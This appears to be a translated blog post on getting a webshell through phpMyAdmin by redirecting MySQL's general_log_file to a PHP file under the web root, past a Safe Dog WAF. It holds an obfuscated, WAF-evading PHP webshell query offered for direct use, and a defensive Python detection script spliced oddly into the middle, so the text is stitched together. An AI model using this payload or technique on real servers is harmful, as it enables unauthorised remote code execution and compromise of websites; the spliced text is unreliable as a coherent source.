Narrator: How do you get a shell in a scenario with a WAF and with `into outfile` disabled in MySQL?
Tilt rotation
First, the environment is as follows:
- OS: Windows 2003
- WAF: Safe Dog 4.0 official edition
- phpMyAdmin: 4.7 (many versions work)
- MySQL: 5.5+
- PHP: 5.3
- Apache: 2.x
Currently `into outfile` is disabled, and the WAF also intercepts attempts to write a file.
So we try to get a shell with some creative thinking.
(MySQL root privileges are required.)
After logging in to phpMyAdmin, view the global variables:
We find `general_log_file`.
This is the log that stores every executed SQL statement (including the SQL statement itself).
However, the `general_log` variable must be in the ON state, which means enabled.
At this point we turn `general_log` ON and then change `general_log_file` to the absolute path of our webshell.
Each time `general_log_file` is changed, MySQL checks whether the log file exists and creates it automatically if it does not.
The file is now created, and the file contents hold the log information for the last SQL statement.
MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 Query SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit
Next, we run SQL queries directly; every statement is written to this shell.php.
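Seen from the defending side, the steps above leave a recognizable trace: statements that switch `general_log` on or repoint `general_log_file` at a script file under the web root. The following Python check is an added example, not code from the original post; the `SET GLOBAL` sample lines, the web root `c:/www`, the extension list and the function names are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Assumption: extensions the web server hands to an interpreter; adjust to your handlers.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp"}

SET_RE = re.compile(
    r"\bSET\s+(?:@@)?GLOBAL(?:\s+|\.)(general_log(?:_file)?)\s*:?=\s*"
    r"(?:'([^']*)'|\"([^\"]*)\"|(\w+))",
    re.IGNORECASE,  # also matches the @@GLOBAL.general_log_file form
)


def path_risks(log_path, web_roots):
    """Return reasons why a general_log_file value is dangerous (empty list if none)."""
    p = PureWindowsPath(log_path.lower().replace("\\", "/"))
    reasons = []
    if p.suffix in SCRIPT_EXTS:
        reasons.append("script extension " + p.suffix)
    if any(PureWindowsPath(r.lower().replace("\\", "/")) in p.parents for r in web_roots):
        reasons.append("inside web root")
    return reasons


def scan_statements(lines, web_roots):
    """Flag runtime changes to the general log found in logged SQL statements."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = SET_RE.search(line)
        if not m:
            continue
        var = m.group(1).lower()
        value = next(g for g in m.groups()[1:] if g is not None)
        if var == "general_log_file":
            findings.append((n, var, value, path_risks(value, web_roots)))
        elif value.upper() in ("ON", "1"):
            findings.append((n, var, value, ["general log enabled at runtime"]))
    return findings


# Constructed sample in the layout of the log excerpt above (Id, Command, Argument).
SAMPLE = [
    '121 Query SHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"',
    "122 Query SET GLOBAL general_log = 'ON'",
    "122 Query SET GLOBAL general_log_file = 'C:/www/site/shell.php'",
    "123 Query SET @@GLOBAL.general_log_file = 'D:/mysql/data/host.log'",
]

FINDINGS = scan_statements(SAMPLE, web_roots=["c:/www"])  # flags sample lines 2, 3 and 4
```

A finding with an empty reason list, such as the last sample line, is still a runtime change to the log destination and worth reviewing against the configured value.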
Because of the WAF, we run the webshell in the form of a remote include.
At our remote address we place the function name; the server side accesses it and loads it into memory, then calls that function directly, which in turn receives the PHP code we submit.
For details, please see the article on making Chopper evade antivirus detection.
Attached below is a SQL query containing a shell statement that avoids detection, so that you can use it directly when you run into this kind of situation:
SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"
There is no interception on this side:
That is all for this article. I have been rather busy these days and have not updated much; thank you all for your continued support!
phpMyAdmin New Posture Getshell